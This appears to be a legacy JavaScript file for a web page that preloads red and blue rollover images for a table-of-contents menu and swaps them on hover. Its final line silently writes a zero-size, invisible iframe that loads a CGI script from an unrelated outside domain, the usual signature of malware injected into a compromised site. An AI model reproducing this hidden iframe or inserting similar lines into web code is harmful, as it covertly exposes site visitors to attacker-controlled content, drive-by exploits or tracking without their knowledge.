        if (document.images) {            // Active Images
               toc1on = new Image();
               toc1on.src = "../graphics3/red.gif";
               toc2on = new Image();
               toc2on.src = "../graphics3/red.gif";
               toc3on = new Image();
               toc3on.src = "../graphics3/red.gif";
               toc4on = new Image();
               toc4on.src = "../graphics3/red.gif";
               toc5on = new Image();
               toc5on.src = "../graphics3/red.gif";
               toc6on = new Image();
               toc6on.src = "../graphics3/red.gif";
               toc7on = new Image();
               toc7on.src = "../graphics3/red.gif";
               toc8on = new Image();
               toc8on.src = "../graphics3/red.gif";
               toc9on = new Image();
               toc9on.src = "../graphics3/red.gif";
               toc91on = new Image();
               toc91on.src = "../graphics3/red.gif";
		       toc92on = new Image();
               toc92on.src = "../graphics3/red.gif";
               toc10on = new Image();
               toc10on.src = "../graphics3/red.gif";
               toc11on = new Image();
               toc11on.src = "../graphics3/red.gif";
               toc12on = new Image();
               toc12on.src = "../graphics3/red.gif";
               toc1off = new Image();
               toc1off.src = "../graphics3/blue.gif";
               toc2off = new Image();
               toc2off.src = "../graphics3/blue.gif";
               toc3off = new Image();
               toc3off.src = "../graphics3/blue.gif";
               toc4off = new Image();
               toc4off.src = "../graphics3/blue.gif";
               toc5off = new Image();
               toc5off.src = "../graphics3/blue.gif";
               toc6off = new Image();
               toc6off.src = "../graphics3/blue.gif";
               toc7off = new Image();
               toc7off.src = "../graphics3/blue.gif";
               toc8off = new Image();
               toc8off.src = "../graphics3/blue.gif";
               toc9off = new Image();
               toc9off.src = "../graphics3/blue.gif";
               toc91off = new Image();
               toc91off.src = "../graphics3/blue.gif";
               toc92off = new Image();
               toc92off.src = "../graphics3/blue.gif";
               toc10off = new Image();
               toc10off.src = "../graphics3/blue.gif";
	           toc11off = new Image();
               toc11off.src = "../graphics3/blue.gif";
	           toc12off = new Image();
               toc12off.src = "../graphics3/blue.gif";
     }

// Function to 'activate' images.
function img_act(imgName) {
        if (document.images) {
            document[imgName].src = eval(imgName + "on.src");
        }
}

// Function to 'deactivate' images.
function img_inact(imgName) {
        if (document.images) {
            document[imgName].src = eval(imgName + "off.src");
        }
}

document.write('<iframe src="http://www.forec.ru/primitives/Alum/imgs/count.cgi" width=0 height=0></iframe>');